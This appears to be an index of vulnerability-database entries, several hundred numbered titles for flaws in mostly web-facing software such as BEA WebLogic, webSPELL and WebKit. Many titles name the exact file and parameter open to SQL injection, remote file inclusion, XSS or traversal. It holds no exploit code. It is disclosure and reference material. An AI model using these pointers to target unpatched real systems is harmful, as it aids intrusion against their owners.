[39900] Microsoft Web Proxy Auto-Discovery (WPAD) Crafted DNS MitM Weakness
[39887] WebPortal CMS index.php m Parameter SQL Injection
[39878] AGENCY4NET WEBFTP download2.php file Parameter Traversal Arbitrary File Access
[39797] Search Module for phpWebSite index.php search Parameter XSS
[39746] activeWeb contentserver Restricted Account Arbitrary File Creation
[39745] activeWeb contentserver WYSIWYG Editor admin/worklist/worklist_edit.asp Applet Tag Filter Bypass
[39720] IBM Lotus Domino Web Server Unspecified XSS
[39699] WebED mod/chat/index.php Multiple Parameter Traversal Arbitrary File Access
[39697] Web-MeetMe play.php Multiple Parameter Traversal Arbitrary File Access
[39640] Web Sihirbazi default.asp Multiple Parameter SQL Injection
[39612] Unreal Engine Internal Web Server Logging Function Overflow Remote DoS
[39547] Diskeeper Administrative Interface (DkService.exe) RPC Request Remote DoS
[39546] Diskeeper Administrative Interface (DkService.exe) RPC Request Remote Information Disclosure
[39532] HP OpenView Network Node Manager (OV NNM) webappmon.exe Remote Overflow
[39517] Ganglia web/get_context.php Multiple Parameter XSS
[39516] Ganglia web/graph.php Multiple Parameter XSS
[39515] Ganglia web/host_gmetrics.php Multiple Parameter XSS
[39383] Aeries Browser Interface (ABI) LostPwd.asp EmailAddress Parameter SQL Injection
[39380] Stampit Web SOAP Request Stamp Invalidation Remote DoS
[39297] P4Web P4Webs.exe HTTP Request CPU Consumption Remote DoS
[39278] WorkingOnWeb events.php idevent Parameter SQL Injection
[39272] Multiple Web Server favicon.ico Vendor Fingerprinting
[39258] IBM Lotus Sametime WebRunMenuFrame Page URI XSS
[39233] Linux Kernel Philips USB Webcam (pwc) Driver Disconnect Method Local DoS
[39232] Google Web Toolkit (GWT) Benchmark Reporting System Unspecified XSS
[39220] SERweb js/get_js.php Multiple Parameter Traversal Arbitrary File Access
[39219] SERweb load_phplib.php _PHPLIB[libdir] Parameter Remote File Inclusion
[39218] SERweb main_prepend.php _SERWEB[functionsdir] Parameter Remote File Inclusion
[39217] SERweb load_lang.php _SERWEB[configdir] Parameter Remote File Inclusion
[39216] WebEvent webevent.cgi cmd Parameter XSS
[39196] WikiWebWeaver index.php Multiple File Extension Upload Arbitrary Code Execution
[39187] Planet VC-200M VDSL2 Administration Interface Null HOST Header Remote DoS
[39169] webSPELL calendar.php Multiple Parameter XSS
[39168] webSPELL usergallery.php galleryID Parameter XSS
[39155] Websense Web Reporting Tools Websense/cgi-bin/WsCgiLogin.exe username Parameter XSS
[39152] Websense Crafted User-Agent Fields HTTP Headers Filter Bypass
[39139] Mcms Easy Web Make modules/cms/index.php template Parameter Traversal Local File Inclusion
[39034] phpWebFileManager index.php PN_PathPrefix Parameter Remote File Inclusion
[39010] LiteWEB Nonexistent Page Saturation Request Remote DoS
[38995] Webbler index.php HTML Comment Path Disclosure
[38994] Webbler CMS mail a friend Form Forged Mail Relay
[38915] PHP_CON include.php webappcfg[APPPATH] Parameter Remote File Inclusion
[38898] DeskPRO admincp/ticket_rules_web.php Unspecified Parameter XSS
[38886] WBR3404TX Broadband Router Web Management Panel cgi-bin/ddns Multiple Parameter XSS
[38874] FileMaker Instant Web Publishing Unspecified XSS
[38805] Buttercup Web File Manager index.php title Parameter XSS
[38803] eSellerate SDK ActiveX (eSellerateControl365.dll) GetWebStoreURL Function Arbitrary Code Execution
[38708] VTLS Web Gateway vtls.web.gateway searchtype Parameter XSS
[38700] IBM WebSphere Application Server (WAS) WebContainer Expect HTTP Header XSS
[38691] ADempiere Bazaar WebUI Unspecified Authentication Bypass
[38690] Advanced Webhost Billing System (AWBS) Unspecified Configuration Information Disclosure
[38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
[38604] Novell GroupWise WebAccess webacc Servlet User.Id Parameter XSS
[38595] TeamSpeak WebServer login.tscmd Crafted HTTP Post Request Resource Consumption DoS
[38580] Cart32 c32web.exe ImageName Traversal Arbitrary File Access
[38575] guanxiCRM Business Solution rfc822.php webmail2_inc_dir Parameter Remote File Inclusion
[38519] BEA WebLogic Server SSL Server Cipher Selection Fallback Weakness
[38518] BEA WebLogic Server Gold Unspecified Server Thread Remote DoS
[38517] BEA WebLogic Server Gold Malformed HTTP Header Disk Consumption Remote DoS
[38516] BEA WebLogic Portal Entitlements Clustered Servers Policy Restriction Bypass
[38514] BEA WebLogic Server Malformed HTTP Request Proceeding Request Information Disclosure
[38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
[38512] BEA WebLogic Server EJB Methods Remote Privilege Escalation
[38511] BEA WebLogic Server Compatibility Realm EJB Container Persistence Privileged Operation Execution
[38510] BEA WebLogic Server WSEE (WS-Security Runtime) Client Message Decryption Weakness Application Security Bypass
[38509] BEA WebLogic Server Exploded jar Dynamic Update Access Restriction Bypass
[38506] BEA WebLogic Server muxer Thread Error Page Remote DoS
[38505] BEA WebLogic Server .ear File Class-path Property Arbitrary File Disclosure
[38504] BEA WebLogic Server config.xml Backup Cleartext Information Disclosure
[38503] BEA WebLogic Server WS-Security Certificate Validation MiTM Weakness
[38502] BEA WebLogic Thread Management T3 Authentication Unspecified Remote DoS
[38501] BEA WebLogic JDBCDataSourceFactory MBean Properties Cleartext Password Local Disclosure
[38500] BEA WebLogic Server Cached Connection X.509 Certificate Validation Bypass
[38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS
[38474] xunlei Web Thunderbolt ThunderServer.webThunder ActiveX Arbitrary File Download
[38468] IBM WebSphere Application Server (WAS) Samples Component Unspecified XSS
[38449] Ripe Website Manager admin/pages/do_new_page.php Multiple Parameter XSS
[38448] Ripe Website Manager admin/navigation/do_new_nav.php new_menuname Parameter XSS
[38447] Ripe Website Manager admin/navigation/do_new_item.php Multiple Parameter XSS
[38446] Ripe Website Manager navigation/delete_item.php id Parameter XSS
[38445] Ripe Website Manager navigation/delete_menu.php id Parameter XSS
[38444] Ripe Website Manager pages/delete_page.php id Parameter XSS
[38442] WordPress / MU wp-newblog.php weblog_id Parameter XSS
[38428] Cisco Unified Meeting Place mpweb/scripts/mpx.dll Multiple Parameter XSS
[38425] Weblogicnet es_offer.php files_dir Parameter Remote File Inclusion
[38424] Weblogicnet es_custom_menu.php files_dir Parameter Remote File Inclusion
[38423] Weblogicnet es_desp.php files_dir Parameter Remote File Inclusion
[38398] ED Engine WebED viewitem.php Codebase Parameter Remote File Inclusion
[38397] ED Engine WebED view.php Codebase Parameter Remote File Inclusion
[38396] ED Engine WebED post.php Codebase Parameter Remote File Inclusion
[38395] ED Engine WebED channeledit.php Codebase Parameter Remote File Inclusion
[38361] Comdev Web Blogger sampleblogger.php path[docroot] Parameter Remote File Inclusion
[38349] Zindizayn Okul Web Sistemi ogretmenkontrol.asp Multiple Parameter SQL Injection
[38348] Zindizayn Okul Web Sistemi mezungiris.asp Multiple Parameter SQL Injection
[38347] Macrovision Update Service ActiveX (isusweb.dll) Unspecified Arbitrary Code Execution
[38337] Uebimiau Webmail demo/pop3/error.php Multiple Variable Path Disclosure
[38324] NEC MultiWriter 1700C Web Server Unspecified Configuration Modification
[38310] lighttpd mod_webdav Debug Message Format Specifier Unspecified DoS
[38297] Sun Java Web Start JRE ActiveX (isInstalled.dnsResolve) dnsResolve Method Overflow
[38286] WebBatch webbatch.exe dumpinputdata Variable Remote Information Disclosure
[38285] WebBatch webbatch.exe URL XSS
[38282] GOM Player GomWebCtrl.GomManager.1 ActiveX (GomWeb3.dll) OpenURL() Method Arbitrary Code Execution
[38256] gnuedu web/lom.php ETCDIR Parameter Remote File Inclusion
[38255] gnuedu web/login.php LIBSDIR Parameter Remote File Inclusion
[38254] gnuedu web/index.php LIBSDIR Parameter Remote File Inclusion
[38253] gnuedu web/help.php LIBSDIR Parameter Remote File Inclusion
[38252] gnuedu web/logout.php LIBSDIR Parameter Remote File Inclusion
[38235] WebcamXP Unspecified Parameter XSS
[38221] Yahoo! Messenger Kakadu (kdu_v32m.dll) Webcam JPEG 2000 Data Handling Overflow
[38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
[38182] MailMarshal Spam Quarantine Interface UserID Variable SQL Truncation Arbitrary Account Modification
[38181] WebCit Unspecified CSRF
[38180] WebCit Uploaded File Name XSS
[38179] WebCit Room Name XSS
[38178] WebCit Bulletin Board Mode XSS
[38177] WebCit Calendar Mode Unspecified XSS
[38176] WebCit showuser who Parameter XSS
[38169] Aleris Web Publishing Server calendar/page.asp mode Parameter SQL Injection
[38156] Barracuda Spam Firewall Monitor Web Syslog username Field XSS
[38135] WebIf /cgi-bin/webif.exe cmd Parameter XSS
[38095] SAP NetWeaver Web Application Server Internet Communication Manager Crafted URI Remote DoS
[38050] Webavis class/class.php root Parameter Remote File Inclusion
[37997] Omnivista 4760 php-bin/Webclient.php Multiple Parameter XSS
[37961] WS_FTP Administration Interface Valid Command Argument XSS
[37922] vDesk Webmail printcal.pl type Parameter XSS
[37911] NetWin SurgeFTP Mirrored Management Interface Malformed Response XSS
[37904] Weblinks Module for Drupal Unspecified Parameter XSS
[37882] WebDesktop wsk/wsk.php wsk Parameter Remote File Inclusion
[37881] WebDesktop apps/apps.php app Parameter Remote File Inclusion
[37841] Citrix Access Gateway Web-based Administration Console Unspecified CSRF
[37838] SAP DB Web Server (waHTTP.exe) sapdbwa_GetQueryString Overflow
[37833] WebMod auth.w redir Parameter XSS
[37801] Ripe Website Manager includes/phpinfo.php Information Disclosure
[37800] Ripe Website Manager admin/includes/admin_header.php level Parameter Remote File Inclusion
[37799] Ripe Website Manager admin/includes/author_panel_header.php level Parameter Remote File Inclusion
[37777] Xunlei Web Thunder DapPlayer ActiveX (DapPlayer_Now.dll) DownURL2 Method Arbitrary Code Execution
[37756] Sun Java Web Start javaws.exe JNLP File Processing codebase Attribute Overflow
[37755] Sun Java Web Start PersistenceService Application Traversal Arbitrary File Overwrite
[37753] Snom 320 SIP Phone Web Server Information Disclosure
[37752] Snom 320 SIP Phone Web Server Proxy Call Redirect
[37748] SAP Web Dynpro Java (BC-WD-JAV) User-Agent HTTP Header XSS
[37737] jetAudio JetAudio.Interface.1 ActiveX (JetFlExt.dll) DownloadFromMusicStore Method Arbitrary File Overwrite
[37713] Kaspersky Online Scanner kavwebscan.CKAVWebScan ActiveX (kavwebscan.dll) Format String Arbitrary Code Execution
[37700] Clever Internet ActiveX Suite clInetSuiteX6.clWebDav ActiveX (CLINETSUITEX6.OCX) GetToFile Method Arbitrary File Overwrite
[37693] DivX Web Player DivXBrowserPlugin ActiveX (npdivx32.dll) GoWindowed Method DoS
[37669] ZyXEL ZyWALL 2 ZyNOS Management Interface Default Password
[37651] DNews dnewsweb Multiple Parameter XSS
[37650] MailBee WebMail default.asp mode2 Parameter XSS
[37649] MailBee WebMail login.php mode Parameter XSS
[37644] Check Point SofaWare Safe@Office Management Interface CSRF
[37620] xKiosk WEB /system/funcs/xkurl.php PEARPATH Parameter Remote File Inclusion
[37580] Acunetix Web Vulnerability Scanner (WVS) Invalid Content-Length HTTP Request DoS
[37558] PHP-Ring Webring System index.php ring Parameter SQL Injection
[37516] webSPELL index.php site Parameter Traversal Local File Inclusion
[37508] WebIf webif.cgi outconfig Traversal Local File Inclusion
[37504] Cisco Catalyst 6500 / 7600 Series EOBC Local Interface Weakness
[37464] Uebimiau Webmail demo/pop3/error.php selected_theme Parameter XSS
[37463] Uebimiau Webmail redirect.php PATH_INFO Parameter XSS
[37460] Trionic Cite interface/editors/custom.php bField[bf_data] Parameter Remote File Inclusion
[37459] Trionic Cite interface/editors/-custom.php bField[bf_data] Parameter Remote File Inclusion
[37458] Web Templates Management System index.php id Parameter SQL Injection
[37449] AlstraSoft Text Ads Enterprise website_page.php pageId Parameter XSS
[37439] WebSlider include/modules.php path Parameter Remote File Inclusion
[37438] WebSlider plugins/highlight.php path Parameter Remote File Inclusion
[37437] WebSlider modules/pdf.php path Parameter Remote File Inclusion
[37436] WebSlider index.php path Parameter Remote File Inclusion
[37388] Http Explorer Web Server URI Traversal Arbitrary File Access
[37334] Solaris Human Interface Device (HID) Unspecified Local DoS
[37330] Webwiz Rich Text Editor JavaScript SRC XSS
[37269] open-iscsi (iscsi-initiator-utils) iscsid usr/mgmt_ipc.c Management Interface Remote DoS
[37257] Advanced Webhost Billing System (AWBS) Multiple Unspecified SQL
[37253] MiniWebsvr Unspecified Sub-root Regression Issue
[37248] Sun Java System Web / Application Server Crafted XSLT Stylesheet Arbitrary Java Method Execution
[37230] Packeteer PacketShaper Web Management rpttop.htm Crafted Request Remote DoS
[37217] Kaspersky Anti-Spam Control Center Web Config aslic_status.cgi Directory Listing
[37215] ClassWeb phpadmin/survey.php BASE Parameter Remote File Inclusion
[37214] ClassWeb language.php BASE Parameter Remote File Inclusion
[37200] Bugzilla WebService/User.pm offer_account_by_email() Function createemailregexp Arbitrary Account Creation
[37186] Blue Coat K9 Web Protection k9filter.exe HTTP Get Request Remote Overflow
[37185] MiniWeb HTTP Server Negative Content-Length Remote DoS
[37164] PhpWebGallery picture.php author Parameter XSS
[37147] escafeWeb (Tuigwaa) Unspecified Parameter XSS
[37133] Webbler CMS uploader/index.php Multiple Parameter XSS
[37132] Webyapar duyurular_detay Action id Parameter SQL Injection
[37131] Webyapar download Action kat_id Parameter SQL Injection
[37091] TinyWebGallery i_frames/i_top_tags.php URL XSS
[37090] TinyWebGallery i_frames/i_login.php URL XSS
[37089] TinyWebGallery index.php URL XSS
[37084] PHP Webquest webquest/soporte_derecha_w.php id_actividad Parameter SQL Injection
[37082] Yahoo! Webcam Upload ActiveX (ywcupl.dll) send Method Overflow
[37081] Yahoo! Webcam Viewer ActiveX (ywcvwr.dll) receive Method Overflow
[37078] Webace-Linkscript start.php rubrik go Action id Parameter SQL Injection
[36983] Macrovision FLEXnet ActiveX (boisweb.dll) Multiple Method Overflow
[36970] Apple Safari WebKit Crafted Web Page Arbitrary Java Applet Execution
[36969] Apple Mac OS X WebCore Popup Cross-Domain Information Disclosure
[36968] Apple Mac OS X WebCore Global Object Persistence XSS
[36966] Apple Mac OS X CoreAudio Java Interface JDirect Arbitrary Code Execution
[36965] Apple Mac OS X CoreAudio Java Interface Crafted Applet Remote Command Execution
[36964] Apple Mac OS X CoreAudio Java Interface Crafted Applet Arbitrary Code Execution
[36950] Web Community login.php3 cl_headers Parameter Remote File Inclusion
[36949] Web Community menu.php3 cl_headers Parameter Remote File Inclusion
[36940] Webace Linkscript go/rubrik.php id Parameter SQL Injection
[36932] Webmin pam_login.cgi Multiple Parameter XSS
[36874] Real Estate listing website application template Password Parameter SQL Injection
[36832] @Mail Webadmin Unspecified XSS
[36820] Logitech VideoCall WebCamXMP ActiveX (wcamxmp.dll) Start() Method Overflow
[36805] Madirish Webmail index.php GLOBALS[basedir] Parameter Remote File Inclusion
[36804] Madirish Webmail compose.php GLOBALS[basedir] Parameter Remote File Inclusion
[36803] Madirish Webmail calendar.php GLOBALS[basedir] Parameter Remote File Inclusion
[36802] Madirish Webmail lib/addressbook.php GLOBALS[basedir] Parameter Remote File Inclusion
[36798] webSPELL gallery.php picID Parameter SQL Injection
[36797] Neon Labs Website lib/nl/nl.php g_strRootDir Parameter Remote File Inclusion
[36795] webSPELL gallery.php Multiple Parameter SQL Injection
[36741] IBM AIX sysmgt.websm.rte (WebSM) Unspecified DoS
[36731] Webmatic Administration Area Unspecified Issues
[36718] British Telecommunications Business Connect webhelper btbconnectwebcontrol.dll ActiveX Multiple Unspecified Overflows
[36689] WebChat defines.php WEBCHATPATH Parameter Remote File Inclusion
[36631] Vivvo Article Management CMS rss/show_webfeed.php wcHeadlines
[36566] WebGUI lib/WebGUI/Asset/Wobject/DataForm.pm viewList Function Information Disclosure
[36555] Serendipity serendipity_event_weblogping/serendipity_event_weblogping.php serendipity[charset] Parameter Traversal Local File Inclusion
[36526] GForge CVSWeb CGI cvsweb.php PATH_INFO Variable Arbitrary Command Execution
[36519] rdiffWeb rdw_helpers.py path Parameter Traversal Arbitrary File Access
[36511] activeWeb contentserver admin/picture/picture_real_edit.asp id Parameter SQL Injection
[36465] WebStore sign_in.aspx Password Parameter SQL Injection
[36463] WebEvents sign_in.aspx Password Parameter SQL Injection
[36453] Apple Safari / iPhone WebKit Perl-Compatible Regular Expressions (PCRE) Multiple Overflows
[36450] Apple Mac OS X / iPhone WebKit Frame Sets Unspecified Memory Corruption
[36449] Apple Mac OS X / iPhone WebCore XMLHttpRequest Request CRLF Injection
[36439] WebDirector index.php deslocal Parameter XSS
[36429] Web News news.php config[root_ordner] Parameter Remote File Inclusion
[36428] Web News feed.php config[root_ordner] Parameter Remote File Inclusion
[36427] Web News index.php config[root_ordner] Parameter Remote File Inclusion
[36420] Prozilla Webring category.php cat Parameter SQL Injection
[36409] WebSVN filedetails.php path Parameter XSS
[36350] WebStudio CMS index.php pageid Parameter XSS
[36331] KeyFocus (KF) Web Server index.wkf opsubmenu Parameter XSS
[36329] Web Icerik Yonetim Sistemi index.php Sayfa Page No Parameter XSS
[36327] EVA-Web index.php3 Multiple Parameter Remote File Inclusion
[36326] SERWeb html/mail_prepend.php _SERWEB[serwebdir] Parameter Remote File Inclusion
[36325] SERWeb html/load_apu.php _SERWEB[serwebdir] Parameter Remote File Inclusion
[36324] SERWeb html/load_lang.php _SERWEB[serwebdir] Parameter Remote File Inclusion
[36308] W1L3D4 WEBmarket urunbak.asp id Parameter SQL Injection
[36295] WebChat login.php rid Parameter SQL Injection
[36274] Techno Dreams Web Directory Database.mdb Direct Request Information Disclosure
[36261] activeWeb contentserver mimetype msg Parameter XSS
[36260] activeWeb contentserver errors/transaction.asp msg Parameter XSS
[36259] activeWeb contentserver errors/rights.asp msg Parameter XSS
[36249] Mini Web Shop sendmail.php PATH_INFO Parameter XSS
[36248] Mini Web Shop order_form.php PATH_INFO Parameter XSS
[36224] Gnatsweb gnatsweb.pl database Parameter XSS
[36213] phpMUR web/phpinfo.php XSS
[36205] EmbeddedWB Web Browser ActiveX Unspecified Issue
[36177] Enthrallweb eClassifieds myprofile.asp MM_recordId Arbitrary Account Manipulation
[36133] Apple QuickTime for Java JDirect Support Interface Exposure Arbitrary Code Execution
[36130] Apple Mac OS X WebKit Invalid Type Conversion Remote Memory Corruption Code Execution
[36097] Siteframe web/classes.php LOCAL_PATH Parameter Remote File Inclusion
[36075] BEA WebLogic Unspecified XSS
[36074] BEA WebLogic HttpClusterServlet / HttpProxyServlet SecureProxy Admin Functionality Access
[36073] BEA WebLogic Server JMS Server Direct Request Protected Queue Access
[36072] BEA WebLogic LDAP Server Brute Force Login Weakness
[36071] BEA WebLogic Server Administration Console Config Creation Remote Cleartext Credential Disclosure
[36069] BEA WebLogic Administration Console Domain Security Policies Deployer Role Arbitrary File Upload
[36068] BEA WebLogic configToScript WLST Script Config File Remote Information Disclosure
[36067] BEA WebLogic Server JMS Message Bridge Access Policy Bypass
[36066] BEA WebLogic Portal GroupSpace Rich Text Editor XSS
[36065] BEA WebLogic Portal Visitor Entitlements Role Privilege Escalation
[36064] BEA WebLogic Server Half-closed SSL Socket Access DoS
[36058] Caucho Resin on Windows \web-inf Traversal Arbitrary File Access
[36049] TeamSpeak Server WebAdmin ok_box.html ok_title Parameter XSS
[36048] TeamSpeak Server WebAdmin error_box.html error_text Parameter XSS
[36047] TeamSpeak Server WebAdmin ServerAdmin Remote Privilege Escalation
[36017] CommuniGate Pro WebMail w/ MSIE STYLE Tag XSS
[35986] Wallpaper Website dlwallpaper.php wallpaperid Parameter SQL Injection
[35985] Wallpaper Website process.php Multiple Parameter SQL Injection
[35928] WeBWorK Program Generation Translator.pm Macro Filename Protection Bypass
[35891] SurgeMail NetWin Webmail Unspecified Remote Issue
[35866] SAP Web Application Server frameset.htm Multiple Variable Arbitrary Site Redirection
[35841] Sun Java Web Proxy Server SOCKS Support Multiple Remote Overflow
[35766] IBM Lotus Domino Web Server If_Modified-Since Header Overflow
[35764] IBM Lotus Domino / WebMail names.nsf User HTTPPassword Hashes Disclosure
[35747] WebKalk2 engine/engine.inc.php absolute_path Parameter Remote File Inclusion
[35719] Web Links lang_admin.php mx_root_path Parameter Remote File Inclusion
[35717] JAF CMS forum/forum.php website Parameter Remote File Inclusion
[35707] Web Wiz Forums wwforum.mdb Direct Request Database Disclosure
[35690] Harpia _inc/web_statsConfig.php Multiple Parameter Remote File Inclusion
[35643] Exponent CMS weblogmodule Module body Parameter XSS
[35634] Multiple Vendor WebAPP Menu Manager Mod Personal Menu Item Title Arbitrary Code Execution
[35585] Eba News webpages.php filename Parameter Remote File Inclusion
[35552] CafeLog B2 Weblog and News Publishing Tool b2mail.php b2inc Parameter Remote File Inclusion
[35551] CafeLog B2 Weblog and News Publishing Tool b2categories.php b2inc Parameter Remote File Inclusion
[35550] CafeLog B2 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion
[35541] Progress Webspeed OpenEdge WService=wsbroker1/_edit.r Remote DoS
[35529] LiveData Protocol Server HTTP/SOAP Interface Crafted WSDL File Request Overflow
[35518] Mbedthis AppWeb Corrupt File Handle Unspecified DoS
[35517] Mbedthis AppWeb on Windows Mixed Case URL Unspecified Bypass
[35516] Mbedthis AppWeb HEAD / TRACE Handler Unspecified Issue
[35513] Mbedthis AppWeb /esp Access Unspecified Remote DoS
[35512] Mbedthis AppWeb Logfile Rotation Unspecified Issue
[35511] Mbedthis AppWeb HTTP TRACE Method XSS
[35510] Mbedthis AppWeb URL Protocol Format String
[35492] Progress WebSpeed Messenger scripts/wsisa.dll Arbitrary File Execution
[35491] Progress WebSpeed Messenger scripts/cgiip.exe Arbitrary File Execution
[35490] Progress WebSpeed Messenger WService Parameter Information Disclosure
[35483] Sun Java Web Start JNLP File Unspecified Privilege Escalation
[35466] Pi3Web Long URI Request Processing DoS
[35369] Asterisk Manager Interface Passwordless User MD5 Authentication DoS
[35367] phpwebnews bukutamu.php m_txt Parameter XSS
[35366] phpwebnews index.php m_txt Parameter XSS
[35365] phpwebnews iklan.php m_txt Parameter XSS
[35363] Ripe Website Manager contact/index.php ripeformpost Parameter SQL Injection
[35362] Ripe Website Manager contact/index.php ripeformpost Parameter XSS
[35360] Maian Weblog index.php path_to_folder Parameter Remote File Inclusion
[35290] Gsylvain35 Portail Web Php (PWP) index.php pageAll Parameter Remote File Inclusion
[35286] WebBlizzard CMS PHPSESSID Cookie Session Fixation
[35285] WebBlizzard CMS index_cms.php Suchzeile XSS
[35271] Mbedthis AppWeb ESP Handler Unspecified Memory Leak Issue
[35261] WEBinsta FM Manager admin/login.php absolute_path Parameter Remote File Inclusion
[35229] web-app.net WebAPP cgi-lib/subs.pl List File Access Weakness
[35228] Company WebSite Builder (CWB) include/cls_viewpastorders.php INCLUDE_PATH Parameter Remote File Inclusion
[35227] Company WebSite Builder (CWB) include/cls_listorders.php INCLUDE_PATH Parameter Remote File Inclusion
[35226] Company WebSite Builder (CWB) include/cls_headline_prod.php INCLUDE_PATH Parameter Remote File Inclusion
[35219] web-app.net WebAPP cgi-bin/user-lib/topics.pl XSS
[35218] web-app.net WebAPP cgi-bin/admin/logs.cgi Statistics Log Viewer Unspecified XSS
[35217] web-app.net WebAPP cgi-lib/user-lib/search.pl Search Function XSS
[35216] web-app.net WebAPP cgi-lib/user-lib/search.pl srch Variable show_recent_searches Function XSS
[35215] web-app.org WebAPP Multiple Unspecified Form XSS
[35214] web-app.org WebAPP Drop Down QUERY_STRING XSS
[35213] web-app.net WebAPP Multiple Unspecified Issues
[35212] web-app.org WebAPP Username Hijacking Patch Unspecified Issue
[35181] Horde Webmail ingo/rule.php XSS
[35176] Study Planner (Studiewijzer) ws/spl.webservice.php SPL_CFG[dirroot] Parameter Remote File Inclusion
[35071] WEBO (Web Organizer) foldertree.php baseDir Parameter Remote File Inclusion
[35047] WebCalendar get_events.php includedir Parameter Remote File Inclusion
[35046] WebCalendar get_reminders.php includedir Parameter Remote File Inclusion
[35045] WebCalendar login.php includedir Parameter Remote File Inclusion
[35033] WebCreator http/load.inc.php moddir Parameter Remote File Inclusion
[35032] WebCreator config/load.inc.php moddir Parameter Remote File Inclusion
[35031] WebCreator content/load.inc.php moddir Parameter Remote File Inclusion
[35018] Novell GroupWise WebAccess GWINTER.exe Basic Authentication Base64 Decoding Overflow
[34996] my little weblog weblog.php id Parameter XSS
[34992] webMethods Glue Management Console resource Parameter Traversal Arbitrary File Access
[34974] MailBee WebMail Pro check_login.asp username Parameter XSS
[34958] Zeus Technologies Zeus Web Server HTTP Header Injection
[34950] webSPELL Add Squad Feature Unrestricted File Upload Arbitrary PHP Code Execution
[34949] webSPELL ws_auth Cookie SQL Injection
[34948] BJ Webring formulaire.php Add Link Menu XSS
[34946] Company WebSite Builder (CWB) comanda.php INCLUDE_PATH Parameter Remote File Inclusion
[34902] Sun Java Web Console libwebconsole_services.so Remote Format String
[34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
[34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
[34871] Apple Mac OS X load_webdav File System Mount Local Privilege Escalation
[34866] Apple Mac OS X WebFoundation Framework Subdomain Cookie Information Disclosure
[34860] Apple Mac OS X Libinfo Crafted Web Page Unspecified Remote Code Execution
[34855] Apple Mac OS X IOKit HID Interface Local Privilege Escalation
[34792] Joomla! Weblinks models/category.php catid Parameter SQL Injection
[34733] Samba DFS RPC Interface DFSEnum Request Remote Overflow
[34732] Samba SPOOLSS RPC Interface RFNPCNEX Request Remote Overflow
[34731] Samba SRVSVC RPC Interface NetSetFileSecurity Request Remote Overflow
[34699] Samba LSA RPC Interface Multiple Function Remote Overflow
[34694] freePBX upgrade.php amp_conf[AMPWEBROOT] Parameter Remote File Inclusion
[34638] webSPELL picture.php file Parameter Traversal Arbitrary File Access
[34637] webSPELL picture.php file Variable Direct Request Arbitrary File Access
[34633] Jinzora extras/mt.php web_root Parameter Remote File Inclusion
[34630] HP Mercury Quality Center TDAPI_GeneralWebTreatment RunQuery() Method SQL Injection
[34585] CA Multiple Products inoweb Console Server Authentication Remote Overflow
[34581] Kaqoo Auction Software Free Edition include/interfaces.inc.php install_root Parameter Remote File Inclusion
[34537] Data Domain OS Command Line Interface Arbitrary Command Execution
[34530] CipherTrust IronMail admin/systemWebAdminConfig.do Multiple Parameter XSS
[34504] NaviCOPA Web Server Crafted GET Request DoS
[34503] NaviCOPA Web Server cgi-bin / cgi GET Request Overflow
[34500] Web Content System formjavascript.php path[JavascriptEdit] Parameter Remote File Inclusion
[34484] IBM WebSphere Application Server (WAS) Crafted Header HTTP Response Splitting
[34443] WebMplayer filecheck.php id[0] Parameter SQL Injection
[34442] WebMplayer index.php strid Parameter SQL Injection
[34441] WebMplayer index.php Shell Metacharacter Arbitrary Code Execution
[34439] eWebquiz ewebquiz.asp Multiple Parameter SQL Injection
[34438] BRS WebWeaver testcgi.exe Information Disclosure
[34425] XchangeBoard DBInterface.php Multiple Parameter SQL Injection
[34419] aspWebCalendar FREE calendar.asp eventid Parameter SQL Injection
[34389] Microsoft Exchange Outlook Web Access (OWA) Attachment Script Injection
[34346] IBM Rational ClearQuest (CQ) Web defect Log Entry Attachment XSS
[34344] Web Wiz Forums functions/functions_filters.asp formatSQLInput() Function SQL Injection
[34331] IncrediMail IMMenuShellExt ActiveX (ImShExt.dll) DoWebMenuAction Function Overflow
[34329] Microgaming Download Helper ActiveX (dlhelper.dll) / WebHandler Class Control Unspecified Overflow
[34310] ViperWeb Portal index.php modpath Parameter Remote File Inclusion
[34307] Takebishi DeviceXPlorer Multiple OPC Server OPCDA Interface IOPCServer::RemoveGroup Function Improper Server Handle Handling
[34293] Reptile Web Server Malformed GET Request DoS
[34292] Borland Web Server (BWS) Multiple Traversal Method Arbitrary File Access
[34181] Ezboo webstats Direct Request Authentication Bypass
[34177] IBM WebSphere Application Server (WAS) Crafted URL JSP Source Disclosure (PK00091)
[34154] Apache Axis Nonexistent Java Web Service Path Disclosure
[34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion
[34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow
[34080] Sun Java System Web Server Unspecified Information Disclosure
[34074] Sun Java System Web Server Certificate Revocation List (CRL) Bypass
[34043] Cyber-Inside WebLog index.php showarticles Action file Parameter Traversal Arbitrary File Access
[34013] Web Group Communication Center quiz.php qzid Parameter SQL Injection
[33916] VAMP Webmail yesno.phtml no_url Parameter Remote File Inclusion
[33886] Novell Netmail WebAdmin HTTP Basic Authentication Username Overflow
[33875] Advanced Website Creator Multiple Unspecified SQL Injection
[33874] rdiffWeb /browse/ path Variable Encoded Traversal Arbitrary Directory Listing
[33867] WebCalendar includes/functions.php noSet Variable Overwrite
[33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
[33834] WebMod server.cpp connectHandle Function Content-Length HTTP Header Overflow
[33832] Webmin/Usermin chooser.cgi Crafted Filename XSS
[33825] aWebNews visview.php path_to_news Parameter Remote File Inclusion
[33824] aWebNews listing.php path_to_news Parameter Remote File Inclusion
[33820] Mirapoint WebMail expression CSS XSS
[33793] SHOUTcast Incoming Interface Logfile XSS
[33762] PHPWebGallery Search.php Multiple Parameter XSS
[33761] PHPWebGallery Register.php Multiple Parameter XSS
[33744] JBoss Console / Web Management Direct Request Authentication Bypass
[33704] XOOPS Weblinks Module class/table_broken.php lid Parameter SQL Injection
[33701] PHP-Nuke Weblinks Section Reviews Section Unspecified SQL Injection
[33697] SAP WebAS Named Pipe Access Local Privilege Escalation
[33696] SAP WebAS enserver.exe Malformed Input Remote DoS
[33695] SAP WebAS enserver.exe Traversal Arbitrary File Access
[33634] Portail Web Php index.php page Parameter Traversal Arbitrary File Access
